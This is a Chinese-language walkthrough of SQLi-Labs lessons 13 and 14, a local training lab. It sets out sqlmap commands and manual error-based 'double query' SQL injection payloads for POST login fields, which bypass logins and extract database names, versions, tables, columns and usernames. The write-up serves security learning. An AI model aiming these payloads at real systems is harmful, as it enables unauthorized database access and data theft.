sqlmap方法
python2 sqlmap.py -u http://127.0.0.1/sqlilabs/Less-13/index.php?id=1 --data "uname=')or('1')=('1 &passwd=')or('1')=('1&submit=Submit" --dbs --threads 10 --batch --technique EBS
第十三关
源码分析
可以看到闭合字符为(‘’)
再查看输出的语句,可以判断出如果语句报错会输出一些东西,所以这一关是基于POST双查询注入
开始干
一、判断注入点
1.寻找闭合字符(并注释)
uname=admin&passwd=adm'&submit=Submit
发现单引号报错了,注释一下试试
uname=admin&passwd=adm' and 1=1 --+&submit=Submit
设为恒为真发现还是报错,所以这个闭合字符是基于’上再加字符
uname=admin&passwd=adm' ) and 1=1 --+&submit=Submit
发现不报错了,然后闭合字符就是(‘’)
二、判断列数
uname=admin&passwd=adm' ) order by 2 --+&submit=Submit(没报错)
uname=admin&passwd=adm' ) order by 3 --+&submit=Submit (报错)
三、构造payload
1.首先构造一个简单的双查询(方便以后往里面插数据)
uname=admin&passwd=adm' ) union select 1,2 --+&submit=Submit
2.构造双查询的payload并依次爆出库,表,字段,数据
爆库
uname=admin &passwd=') union select count(*),concat((select schema_name from information_schema.schemata limit 6,1),(floor(rand()*2))) as a from information_schema.tables group by a#&submit=Submit
爆版本号
uname= a') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2)) as a from information_schema.tables group by a # &passwd=&submit=Submit
爆表名
uname=admin &passwd=') union select count(*),concat(( select table_name from information_schema.tables where table_schema="security" limit 3,1),(floor(rand()*2))) as a from information_schema.tables group by a#&submit=Submit
爆字段名
uname=admin &passwd=') union select count(*),concat(( select column_name from information_schema.columns where table_name="users" limit 1,1),(floor(rand()*2))) as a from information_schema.columns group by a#&submit=Submit
爆数据
uname=admin &passwd=') union select count(*),concat(( select username from users limit 1,1),(floor(rand()*2))) as a from information_schema.columns group by a#&submit=Submit
结束
第十四关
源码分析
发现只有被双引号包裹
直接判断注入点
其他和13关一样
uname=admin" and 1=1--+&passwd=&submit=Submit
sqlmap方法
python2 sqlmap.py -u "http://127.0.0.1/sqlilabs/Less-14/index.php?id=1" --data "uname=1&passwd=1&submit=Submit" --dbs --threads 8 --technique E --dbms mysql